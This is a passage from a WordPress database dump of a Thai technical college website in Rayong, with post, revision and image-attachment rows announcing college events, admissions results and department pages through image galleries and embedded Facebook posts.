(1893, 3, '2018-03-15 12:52:05', '2018-03-15 05:52:05', '<img class=\"aligncenter wp-image-1887 size-large\" src=\"/wp-content/uploads/2018/03/28471494_550052755370917_165237536589873152_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1889 size-large\" src=\"/wp-content/uploads/2018/03/28576547_550052162037643_702948303674802176_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1891 size-large\" src=\"/wp-content/uploads/2018/03/28660448_550061188703407_169774164515749888_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1886 size-large\" src=\"/wp-content/uploads/2018/03/28468726_550052725370920_2177750102146285568_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1884 size-large\" src=\"/wp-content/uploads/2018/03/28379794_550062678703258_1361089425458593792_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1888 size-large\" src=\"/wp-content/uploads/2018/03/28576414_550062942036565_62988530074255360_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1892 size-large\" src=\"/wp-content/uploads/2018/03/28660485_550063245369868_1310164333237370880_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1885 size-large\" src=\"/wp-content/uploads/2018/03/28468617_550061042036755_8607802566484426752_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1890 size-large\" src=\"/wp-content/uploads/2018/03/28577859_550061232036736_1955049390649376768_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1883 size-large\" src=\"/wp-content/uploads/2018/03/28378287_550052688704257_3586775167969263616_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h4><span style=\"color: #0000ff;\">รูปกิจกรรมเพิ่มเติม--></span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.550061958703330&type=3&pnref=story\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h4>\r\n ', 'พิธีเปิดโครงการขยายโอกาสการศึกษาวิชาชีพและพัฒนาทักษะวิชาชีพ เพื่อเตรียมความพร้อมเข้าสู่ตลาดแรงงาน กิจกรรมพัฒนารูปแบบและยกระดับ ศูนย์ซ่อมสร้างเพื่อชุมชน (Fix It Center Thailand 4.0) โดยได้รับเกียรติจากท่าน กิตติ เกียรติ์มนตรี รองนายกองค์การบริหารส่วนจังหวัดระยอง มาเป็นประธานในพิธีเปิด วันศุกร์ที่ 2 มีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1882-revision-v1', '', '', '2018-03-15 12:52:05', '2018-03-15 05:52:05', '', 1882, 'http://www.technicrayong.ac.th/1882-revision-v1/', 0, 'revision', '', 0),
(1894, 3, '2018-03-15 14:34:56', '2018-03-15 07:34:56', ' \r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D551371985238994%26id%3D100010985913485&width=500\" width=\"500\" height=\"705\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', '\"งานสุดยอดนวัตกรรมอาชีวศึกษา\" การประกวดสิ่งประดิษฐ์จองคนรุ่นใหม่ และการแข่งขันหุ่นยนต์อาชีวศึกษา ระดับชาติ ณ ศูนย์การค้าเซียร์รังสิต จ.ปทุมธานี ในระหว่างวันที่ 27 กุมภาพันธ์ - 3 มีนาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%94%e0%b8%a2%e0%b8%ad%e0%b8%94%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7', '', '', '2018-03-15 14:36:19', '2018-03-15 07:36:19', '', 0, 'http://www.technicrayong.ac.th/?p=1894', 448, 'post', '', 0),
(1895, 3, '2018-03-15 14:34:37', '2018-03-15 07:34:37', '', '28660456_551371961905663_1189305340802367488_n', '', 'inherit', 'closed', 'closed', '', '28660456_551371961905663_1189305340802367488_n', '', '', '2018-03-15 14:34:37', '2018-03-15 07:34:37', '', 1894, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28660456_551371961905663_1189305340802367488_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(1896, 3, '2018-03-15 14:34:56', '2018-03-15 07:34:56', ' \r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D551371985238994%26id%3D100010985913485&width=500\" width=\"500\" height=\"705\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', '\"งานสุดยอดนวัตกรรมอาชีวศึกษา\" การประกวดสิ่งประดิษฐ์จองคนรุ่นใหม่ และการแข่งขันหุ่นยนต์อาชีวศึกษา ระดับชาติ ณ ศูนย์การค้าเซียร์รังสิต จ.ปทุมธานี ในระหว่างวันที่ 27 กุมภาพันธ์ - 3 มีนาคาม 2561', '', 'inherit', 'closed', 'closed', '', '1894-revision-v1', '', '', '2018-03-15 14:34:56', '2018-03-15 07:34:56', '', 1894, 'http://www.technicrayong.ac.th/1894-revision-v1/', 0, 'revision', '', 0),
(1897, 3, '2018-03-15 14:36:19', '2018-03-15 07:36:19', ' \r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D551371985238994%26id%3D100010985913485&width=500\" width=\"500\" height=\"705\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', '\"งานสุดยอดนวัตกรรมอาชีวศึกษา\" การประกวดสิ่งประดิษฐ์จองคนรุ่นใหม่ และการแข่งขันหุ่นยนต์อาชีวศึกษา ระดับชาติ ณ ศูนย์การค้าเซียร์รังสิต จ.ปทุมธานี ในระหว่างวันที่ 27 กุมภาพันธ์ - 3 มีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1894-revision-v1', '', '', '2018-03-15 14:36:19', '2018-03-15 07:36:19', '', 1894, 'http://www.technicrayong.ac.th/1894-revision-v1/', 0, 'revision', '', 0),
(1898, 3, '2018-03-15 14:38:48', '2018-03-15 07:38:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D552424535133739%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ร่วมกับโรงเรียนอัสสัมชัญระยอง จัดกิจกรรมอบรมหลักสูตร ภายใต้โครงการเสริมประสบการณ์ทางวิชาการและอาชีพให้กับนักเรียนชั้นมัธยมศึกษาตอนปลาย โรงเรียนอัสสัมชัญระยอง ระหว่างวันที่ 5-7 มีนาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%a3%e0%b9%88%e0%b8%a7', '', '', '2018-03-15 14:38:48', '2018-03-15 07:38:48', '', 0, 'http://www.technicrayong.ac.th/?p=1898', 447, 'post', '', 0),
(1899, 3, '2018-03-15 14:38:28', '2018-03-15 07:38:28', '', '28870515_552413485134844_5365049850813480960_o', '', 'inherit', 'closed', 'closed', '', '28870515_552413485134844_5365049850813480960_o', '', '', '2018-03-15 14:38:28', '2018-03-15 07:38:28', '', 1898, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28870515_552413485134844_5365049850813480960_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1900, 3, '2018-03-15 14:38:48', '2018-03-15 07:38:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D552424535133739%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ร่วมกับโรงเรียนอัสสัมชัญระยอง จัดกิจกรรมอบรมหลักสูตร ภายใต้โครงการเสริมประสบการณ์ทางวิชาการและอาชีพให้กับนักเรียนชั้นมัธยมศึกษาตอนปลาย โรงเรียนอัสสัมชัญระยอง ระหว่างวันที่ 5-7 มีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1898-revision-v1', '', '', '2018-03-15 14:38:48', '2018-03-15 07:38:48', '', 1898, 'http://www.technicrayong.ac.th/1898-revision-v1/', 0, 'revision', '', 0),
(1901, 3, '2018-03-15 14:42:16', '2018-03-15 07:42:16', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555371414839051%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'พิธีเปิดโครงการเข้าค่ายเตรียมความพร้อมก่อนไปศึกษาต่อ ณ ประเทศสาธารณรัฐประชาชนจีน สาขาวิชาระบบขนส่งทางราง โดยมี นางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการฝ่ายวิชาการ วิทยาลัยเทคนิคระยอง พร้อมด้วยนักเรียน นักศึกษาสาขาวิชาช่างยนต์ จำนวน 4 คน สาขาวิชาช่างไฟฟ้า จำนวน 4 คน เข้าร่วมโครงการ ในวันอังคารที่ 13 มีนาคม 2561 เวลา 13.00 น. อาคารโดม วิทยาลัยวาปีปทุม จังหวัดมหาสารคาม', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%84%e0%b9%88%e0%b8%b2', '', '', '2018-03-15 14:42:16', '2018-03-15 07:42:16', '', 0, 'http://www.technicrayong.ac.th/?p=1901', 446, 'post', '', 0),
(1902, 3, '2018-03-15 14:42:00', '2018-03-15 07:42:00', '', '29216705_555369088172617_2170964238502199296_o', '', 'inherit', 'closed', 'closed', '', '29216705_555369088172617_2170964238502199296_o', '', '', '2018-03-15 14:42:00', '2018-03-15 07:42:00', '', 1901, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29216705_555369088172617_2170964238502199296_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1903, 3, '2018-03-15 14:42:16', '2018-03-15 07:42:16', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555371414839051%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'พิธีเปิดโครงการเข้าค่ายเตรียมความพร้อมก่อนไปศึกษาต่อ ณ ประเทศสาธารณรัฐประชาชนจีน สาขาวิชาระบบขนส่งทางราง โดยมี นางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการฝ่ายวิชาการ วิทยาลัยเทคนิคระยอง พร้อมด้วยนักเรียน นักศึกษาสาขาวิชาช่างยนต์ จำนวน 4 คน สาขาวิชาช่างไฟฟ้า จำนวน 4 คน เข้าร่วมโครงการ ในวันอังคารที่ 13 มีนาคม 2561 เวลา 13.00 น. อาคารโดม วิทยาลัยวาปีปทุม จังหวัดมหาสารคาม', '', 'inherit', 'closed', 'closed', '', '1901-revision-v1', '', '', '2018-03-15 14:42:16', '2018-03-15 07:42:16', '', 1901, 'http://www.technicrayong.ac.th/1901-revision-v1/', 0, 'revision', '', 0),
(1904, 3, '2018-03-15 15:14:59', '2018-03-15 08:14:59', '', '14-3-2561 15-44-03', '', 'inherit', 'closed', 'closed', '', '14-3-2561-15-44-03', '', '', '2018-03-15 15:14:59', '2018-03-15 08:14:59', '', 1848, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-15-44-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(1905, 3, '2018-03-15 15:15:08', '2018-03-15 08:15:08', '', '14-3-2561 15-44-26', '', 'inherit', 'closed', 'closed', '', '14-3-2561-15-44-26', '', '', '2018-03-15 15:15:08', '2018-03-15 08:15:08', '', 1848, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/14-3-2561-15-44-26.jpg', 0, 'attachment', 'image/jpeg', 0),
(1909, 3, '2018-03-15 15:17:26', '2018-03-15 08:17:26', '<img class=\"aligncenter size-full wp-image-1904\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-03.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1905\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-26-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1906 size-full\" src=\"/wp-content/uploads/2018/03/1.jpg\" alt=\"\" width=\"862\" height=\"641\" />\r\n\r\n<img class=\"aligncenter wp-image-1907 size-full\" src=\"/wp-content/uploads/2018/03/15-3-2561-15-09-28.jpg\" alt=\"\" width=\"937\" height=\"628\" />\r\n\r\n<img class=\"aligncenter wp-image-1908 size-full\" src=\"/wp-content/uploads/2018/03/15-3-2561-15-12-01.jpg\" alt=\"\" width=\"898\" height=\"556\" />', 'ช่างยนต์', '', 'inherit', 'closed', 'closed', '', '1848-revision-v1', '', '', '2018-03-15 15:17:26', '2018-03-15 08:17:26', '', 1848, 'http://www.technicrayong.ac.th/1848-revision-v1/', 0, 'revision', '', 0),
(1911, 3, '2018-03-15 15:19:41', '2018-03-15 08:19:41', '<img class=\"aligncenter size-full wp-image-1904\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-03.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1905\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-26-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1906 size-full\" src=\"/wp-content/uploads/2018/03/1.jpg\" alt=\"\" width=\"862\" height=\"641\" />\r\n\r\n<img class=\"wp-image-1907 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/15-3-2561-15-09-28.jpg\" alt=\"\" width=\"937\" height=\"628\" />\r\n\r\n<img class=\"wp-image-1908 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/15-3-2561-15-12-01.jpg\" alt=\"\" width=\"898\" height=\"556\" />', 'ช่างยนต์', '', 'inherit', 'closed', 'closed', '', '1848-revision-v1', '', '', '2018-03-15 15:19:41', '2018-03-15 08:19:41', '', 1848, 'http://www.technicrayong.ac.th/1848-revision-v1/', 0, 'revision', '', 0),
(1912, 3, '2018-03-22 10:52:38', '2018-03-22 03:52:38', '<p style=\"text-align: center;\"><a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%a5/1-13/\"><img class=\"alignnone size-full wp-image-11876\" src=\"/wp-content/uploads/2021/06/1-1.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%a5/2-10/\"><img class=\"alignnone size-full wp-image-11877\" src=\"/wp-content/uploads/2021/06/2-1.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%a5/3-7/\"><img class=\"alignnone size-full wp-image-11878\" src=\"/wp-content/uploads/2021/06/3.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a></p>', 'ช่างกล', '', 'publish', 'closed', 'closed', '', '%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%a5', '', '', '2021-06-28 11:14:59', '2021-06-28 04:14:59', '', 0, 'http://www.technicrayong.ac.th/?page_id=1912', 0, 'page', '', 0),
(1914, 1, '2018-03-16 06:59:50', '2018-03-15 23:59:50', '', 'ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวช-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9c%e0%b9%88%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2-3', '', '', '2018-03-16 06:59:50', '2018-03-15 23:59:50', '', 806, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวช-2561.jpg', 0, 'attachment', 'image/jpeg', 0),
(1915, 1, '2018-03-16 07:00:44', '2018-03-16 00:00:44', '<h1><a href=\"/wp-content/uploads/2018/01/-ปวช-2561-e1521158423466.jpg\"><img class=\"aligncenter size-large wp-image-1914\" src=\"/wp-content/uploads/2018/01/-ปวช-2561-e1521158423466-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a></h1>\r\n<h1></h1>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">ประกาศรายชื่อผู้มีสิทธิ์สอบ</span></h1>\r\n \r\n<h2 style=\"text-align: center;\"><a href=\"https://goo.gl/RGU4eU\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ff0000;\">กดเพื่อเปิดดู</span></a></h2>\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-807 size-full\" src=\"/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o.jpg\" alt=\"\" width=\"2498\" height=\"656\" />\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_01.png\"><img class=\"aligncenter size-large wp-image-1007\" src=\"/wp-content/uploads/2018/01/201802061754_Page_01-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_02.png\"><img class=\"aligncenter size-large wp-image-1008\" src=\"/wp-content/uploads/2018/01/201802061754_Page_02-694x1024.png\" alt=\"\" width=\"640\" height=\"944\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_03.png\"><img class=\"aligncenter size-large wp-image-1009\" src=\"/wp-content/uploads/2018/01/201802061754_Page_03-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_04.png\"><img class=\"aligncenter size-large wp-image-1010\" src=\"/wp-content/uploads/2018/01/201802061754_Page_04-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_05.png\"><img class=\"aligncenter size-large wp-image-1011\" src=\"/wp-content/uploads/2018/01/201802061754_Page_05-685x1024.png\" alt=\"\" width=\"640\" height=\"957\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_06.png\"><img class=\"aligncenter size-large wp-image-1012\" src=\"/wp-content/uploads/2018/01/201802061754_Page_06-735x1024.png\" alt=\"\" width=\"640\" height=\"892\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_07.png\"><img class=\"aligncenter size-large wp-image-1013\" src=\"/wp-content/uploads/2018/01/201802061754_Page_07-687x1024.png\" alt=\"\" width=\"640\" height=\"954\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_08.png\"><img class=\"aligncenter size-large wp-image-1014\" src=\"/wp-content/uploads/2018/01/201802061754_Page_08-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_09.png\"><img class=\"aligncenter size-large wp-image-1015\" src=\"/wp-content/uploads/2018/01/201802061754_Page_09-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_10.png\"><img class=\"aligncenter size-large wp-image-1016\" src=\"/wp-content/uploads/2018/01/201802061754_Page_10-700x1024.png\" alt=\"\" width=\"640\" height=\"936\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_11.png\"><img class=\"aligncenter size-large wp-image-1017\" src=\"/wp-content/uploads/2018/01/201802061754_Page_11-681x1024.png\" alt=\"\" width=\"640\" height=\"962\" /></a>', 'วิทยาลัยเทคนิคระยองเปิดรับสมัคร นักเรียน นักศึกษา ปีการศึกษา 2561 หลักสูตร ปวช. ,ปวส. และปริญญาตรี', '', 'inherit', 'closed', 'closed', '', '806-revision-v1', '', '', '2018-03-16 07:00:44', '2018-03-16 00:00:44', '', 806, 'http://www.technicrayong.ac.th/806-revision-v1/', 0, 'revision', '', 0),
(1919, 3, '2018-03-21 12:15:55', '2018-03-21 05:15:55', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D558101594566033%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ดำเนินโครงการขยายโอกาสศึกษาวิชาชีพและพัฒนาทักษะวิชาชีพ เพื่อเตรียมความพร้อมเข้าสู่ตลาดแรงงาน กิจกรรมพัฒนารูปแบบและยกระดับศูนย์ซ่อมสร้างเพื่อชุมชน ประจำปีงบประมาณ พ.ศ.2561 (Fix It Center Thailand 4.0) เมื่อระหว่างวันที่ 16-19 มีนาคม 2561 ที่ผ่านมา ณ ศูนย์องค์การบริหารส่วนตำบลเพ โรงเรียนเกาะแก้วพิศดาร เกาะเสม็ด อ.เมือง จ.ระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%aa', '', '', '2018-03-21 12:15:55', '2018-03-21 05:15:55', '', 0, 'http://www.technicrayong.ac.th/?p=1919', 444, 'post', '', 0),
(1920, 3, '2018-03-21 12:15:31', '2018-03-21 05:15:31', '', '29343098_558100277899498_1702886925783793664_o', '', 'inherit', 'closed', 'closed', '', '29343098_558100277899498_1702886925783793664_o', '', '', '2018-03-21 12:15:31', '2018-03-21 05:15:31', '', 1919, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29343098_558100277899498_1702886925783793664_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1921, 3, '2018-03-21 12:15:55', '2018-03-21 05:15:55', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D558101594566033%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ดำเนินโครงการขยายโอกาสศึกษาวิชาชีพและพัฒนาทักษะวิชาชีพ เพื่อเตรียมความพร้อมเข้าสู่ตลาดแรงงาน กิจกรรมพัฒนารูปแบบและยกระดับศูนย์ซ่อมสร้างเพื่อชุมชน ประจำปีงบประมาณ พ.ศ.2561 (Fix It Center Thailand 4.0) เมื่อระหว่างวันที่ 16-19 มีนาคม 2561 ที่ผ่านมา ณ ศูนย์องค์การบริหารส่วนตำบลเพ โรงเรียนเกาะแก้วพิศดาร เกาะเสม็ด อ.เมือง จ.ระยอง', '', 'inherit', 'closed', 'closed', '', '1919-revision-v1', '', '', '2018-03-21 12:15:55', '2018-03-21 05:15:55', '', 1919, 'http://www.technicrayong.ac.th/1919-revision-v1/', 0, 'revision', '', 0),
(1923, 3, '2018-03-22 10:51:25', '2018-03-22 03:51:25', '', '19-3-2561 9-50-06', '', 'inherit', 'closed', 'closed', '', '19-3-2561-9-50-06', '', '', '2018-03-22 10:51:25', '2018-03-22 03:51:25', '', 1912, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(1924, 3, '2018-03-22 10:51:29', '2018-03-22 03:51:29', '', '22-3-2561 9-49-18', '', 'inherit', 'closed', 'closed', '', '22-3-2561-9-49-18', '', '', '2018-03-22 10:51:29', '2018-03-22 03:51:29', '', 1912, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/22-3-2561-9-49-18.jpg', 0, 'attachment', 'image/jpeg', 0),
(1926, 3, '2018-03-22 10:52:38', '2018-03-22 03:52:38', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1925 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-52-16.jpg\" alt=\"\" width=\"904\" height=\"624\" />\r\n\r\n ', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-revision-v1', '', '', '2018-03-22 10:52:38', '2018-03-22 03:52:38', '', 1912, 'http://www.technicrayong.ac.th/1912-revision-v1/', 0, 'revision', '', 0),
(1928, 3, '2018-03-22 10:56:59', '2018-03-22 03:56:59', '', '22-3-2561 10-58-44', '', 'inherit', 'closed', 'closed', '', '22-3-2561-10-58-44', '', '', '2018-03-22 10:56:59', '2018-03-22 03:56:59', '', 1912, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(1929, 3, '2018-03-22 10:57:19', '2018-03-22 03:57:19', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1928 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg\" alt=\"\" width=\"904\" height=\"630\" />\r\n\r\n ', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-revision-v1', '', '', '2018-03-22 10:57:19', '2018-03-22 03:57:19', '', 1912, 'http://www.technicrayong.ac.th/1912-revision-v1/', 0, 'revision', '', 0),
(1931, 3, '2018-03-22 11:29:35', '2018-03-22 04:29:35', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1928 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg\" alt=\"\" width=\"904\" height=\"630\" />\r\n\r\n<img class=\"aligncenter wp-image-1942 size-full\" src=\"/wp-content/uploads/2018/03/111111111.jpg\" alt=\"\" width=\"956\" height=\"627\" />', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-autosave-v1', '', '', '2018-03-22 11:29:35', '2018-03-22 04:29:35', '', 1912, 'http://www.technicrayong.ac.th/1912-autosave-v1/', 0, 'revision', '', 0),
